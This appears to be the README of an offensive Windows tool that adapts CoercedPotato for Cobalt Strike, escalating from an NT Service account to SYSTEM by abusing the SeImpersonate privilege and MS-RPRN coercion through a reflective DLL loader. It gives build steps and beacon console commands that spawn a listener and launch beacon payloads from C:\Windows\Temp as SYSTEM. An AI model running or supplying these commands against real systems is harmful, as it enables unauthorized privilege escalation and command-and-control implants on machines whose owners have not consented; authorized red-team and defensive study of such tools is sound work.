Privilege escalation from NT Service to SYSTEM using SeImpersonateToken privilege and MS-RPRN functions.
Heavily based on https://github.com/Prepouce/CoercedPotato
Reflective Loader from https://github.com/stephenfewer/ReflectiveDLLInjection.
Clone this repo and compile the project in VisualStudio then load dist/coercedpotato.cna
into CobaltStrike.
You first need to spawn the RPC listener with
beacon> CoercedPotato spawn ProcessToSpawn OptionalCmdArgument
for example
beacon> CoercedPotato spawn C:\Windows\Temp\beacon.exe
beacon> CoercedPotato spawn C:\Windows\Temp\loader.exe C:\Windows\Temp\beacon.bin
then you can trigger a SYSTEM call
beacon> CoercedPotato coerce